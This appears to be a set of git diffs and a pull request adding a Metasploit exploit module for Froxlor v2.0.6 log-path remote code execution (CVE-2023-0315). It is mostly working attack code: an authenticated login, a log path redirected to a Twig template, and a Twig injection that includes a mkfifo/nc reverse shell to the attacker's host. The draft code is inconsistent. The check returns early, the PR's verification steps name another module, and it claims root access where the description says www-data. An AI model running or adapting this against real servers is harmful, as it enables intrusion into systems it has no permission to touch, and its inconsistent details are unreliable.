       # session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
       # session.shell_command_token("cat >> #{datastore['WEB_ROOT']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
       # idea #2
       # session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
-      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
+      print_error('NOTE: you must use a meterpreter payload in order to automatically cleanup.')
       print_error("The file: footer.html.twig won't be restored automatically.")
     end
   end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Exploit::CheckCode::Appears("Vulnerable version found: #{version}")
         end
       else
-        Exploit::CheckCode::Unknown("Failed to version info from #{normalize_uri(target_uri.path, version_url)}")
+        Exploit::CheckCode::Detected("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")
       end
     end
   end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),
         OptString.new('PASSWORD', [true, 'A specific password to authenticate with', '']),
         OptString.new('TARGETURI', [true, 'The base path to the vulnerable Froxlor instance', '/froxlor']),
-        OptString.new('WEBROOT_DIR', [true, 'The webroot ', '/var/www/html'])
+        OptString.new('WEB_ROOT', [true, 'The webroot ', '/var/www/html'])
       ]
     )
   end
@@ -190,8 +190,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 302 && res.headers['Location']
       if res.headers['Location'] == 'admin_index.php'
         print_good('Injected payload sucessfully')
-        print_status("Changing log path back to default value while triggering payload: #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/logs/froxlor.log")
-        change_log_path("#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/logs/froxlor.log")
+        print_status("Changing log path back to default value while triggering payload: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
+        change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
       end
     else
       print_error('did not inject payload successfully')
@@ -203,8 +203,8 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Successful login')
     @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
 
-    if change_log_path("#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
-      print_good("Changed logfile path to: #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+    if change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+      print_good("Changed logfile path to: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
       case target['Type']
       when :unix_memory
         execute_command(payload.encoded)
@@ -249,15 +249,15 @@ EOF
     if session.type == 'meterpreter'
       print_status('Cleaning up...')
       print_status('Deleting tampered footer.html.twig file')
-      filename = "#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"
+      filename = "#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"
       session.fs.file.rm(filename)
       fd = session.fs.file.new(filename, 'wb')
       print_status('Rewriting clean footer.html.twig file')
       fd.write(footer_html_twig)
       fd.close
     else
-      # session.shell_command_token("rm #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
-      # session.shell_command_token("cat >> #{datastore['WEBROOT_DIR']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
+      # session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+      # session.shell_command_token("cat >> #{datastore['WEB_ROOT']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
       print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
       print_error("The file: footer.html.twig won't be restored automatically.")
     end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -1,0 +1,234 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Froxlor Log Path RCE',
+        'Description' => %q(
+          Froxlor v2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path
+          to any directory on the OS level which the user www-data can write without restrictions from the backend which
+          leads to writing a malicious Twig template that the application will render. That will lead to achieving a
+          remote command execution under the user www-data.
+        ),
+        'Author'      =>
+          [
+            'Askar',      # discovery
+            'jheysel-r7'  # module
+          ],
+        'References'  =>
+          [
+            [ 'URL', 'https://shells.systems/author/askar/'],
+            [ 'CVE', '2023-0315']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'linux',
+        'Privileged'     => true,
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+          },
+        'Arch'           => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux ',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'CmdStagerFlavor' => %i[echo printf],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+         'Stability' => [CRASH_SAFE],
+         'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+         },
+        'DisclosureDate' => '2023-01-29'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
+        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'notpassword'])
+      ],
+      )
+  end
+
+  def login
+
+    #TODO this will follow redirects as is, no good
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'loginname' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'send' => 'send',
+        'dologin' => ''
+      }
+    )
+
+    if res && (res.code == 302 && res.headers.include?('Location') && res.headers['Location'] == 'admin_index.php')
+      true
+    else
+      false
+    end
+  end
+
+  def check
+
+    return Exploit::CheckCode::Appears
+
+    return Exploit::CheckCode::Unknown("Failed to authenticated to Froxlor") unless login
+
+    print_good('Successful login')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
+      'keep_cookies' => true,
+    )
+
+    return Exploit::CheckCode::Unknown("Failed to load /admin_index.php after successful login") unless res&.code == 200
+
+    xml = res.get_xml_document
+
+
+  end
+
+  def get_csrf_token(url)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, url),
+      'keep_cookies' => true,
+      )
+
+    print_error("Failed to get csrf token") unless res&.code == 200
+
+    csrf_token = nil
+    match = res.body.match(/name="csrf-token" content="(\w+)"/)
+    if match
+      csrf_token = match[1]
+      print_good("CSRF token is : #{csrf_token}")
+    else
+      fail_with(Failure::Unknown, 'There is no CSRF token in HTTP response.')
+    end
+
+    csrf_token
+
+  end
+
+  def change_log_path
+
+    csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
+    new_logfile = '/var/www/html/templates/Froxlor/footer.html.twig'
+
+    mime = Rex::MIME::Message.new
+    mime.add_part('0', nil, nil, 'form-data; name="logger_enabled"')
+    mime.add_part('1', nil, nil, 'form-data; name="logger_enabled"')
+    mime.add_part('2', nil, nil, 'form-data; name="logger_severity"')
+    mime.add_part('file', nil, nil, 'form-data; name="logger_logtypes[]"')
+    mime.add_part(new_logfile, nil, nil, 'form-data; name="logger_logfile"')
+    mime.add_part('0' , nil, nil, 'form-data; name="logger_log_cron"')
+    mime.add_part(csrf_token, nil, nil, 'form-data; name="csrf_token"')
+    mime.add_part("overview", nil, nil, 'form-data; name="page"')
+    mime.add_part('', nil, nil, 'form-data; name="action"')
+    mime.add_part('send', nil, nil, 'form-data; name="send"')
+
+    res2 = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/admin_settings.php?'),
+      'vars_get' => { 'page' => 'overview', 'part' => 'logging'},
+      'keep_cookies' => true,
+      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
+      'data'   => mime.to_s
+    )
+
+    if res2 && res2.code == 200
+      if res2.body.include?("The settings have been successfully saved")
+        return true
+      end
+    end
+
+    false
+
+  end
+
+  def execute_command(cmd, _opts = {})
+    csrf_token = get_csrf_token('/admin_index.php')
+
+    data = {
+      'theme' =>  cmd,
+      'csrf_token' => csrf_token,
+      'page' => "change_theme",
+      'send' => "send",
+      'dosave' => "",
+    }
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
+      'keep_cookies' => true,
+      'vars_post' => data
+      )
+
+    if res && res.code == 200 && res.headers['Location']
+      if res.headers['Location'] == 'admin_index.php'
+        print_good('Injected payload sucessfully')
+      end
+    end
+
+    print_status("triggering payload")
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
+      'keep_cookies' => true,
+    )
+  end
+
+  def exploit
+
+    print_error("Login failed") unless login
+    print_good('Successfully Logged in!')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
+      'keep_cookies' => true,
+      )
+
+    if change_log_path
+      print_good('we ou heur')
+      case target['Type']
+      when :unix_memory
+        execute_command("{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc #{datastore['LHOST']} #{datastore['LPORT']} >/tmp/f']|filter('exec')}}")
+      when :linux_dropper
+        execute_cmdstager
+      end
+    end
+  end
+
+
+end


### PR DESCRIPTION
PoC: https://shells.systems/froxlor-v2-0-6-remote-command-execution-cve-2023-0315/

This module is based off the above PoC. The vulnerability works like so:

Change the logfile to:`templates/Froxlor/footer.html.twig` using builtin authenticated functionality.
Write a payload to the new logfile by changing the "theme" of the site, again with builtin functionality.
If the theme you send to the server is formatted like so: `{{['COMMAND']|filter('exec')}}` you achieve RCE when you reload the page because the twig file executes your command 🎉 

## Note to Reviewer
Accepting suggestions for my clean up attempt in `on_new_session` for the Unix Command target.

## Verification

List the steps needed to make sure this thing works

1. Start msfconsole
1. Do: `use exploit/linux/http/panos_auth_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a Meterpreter session as the `root` user.
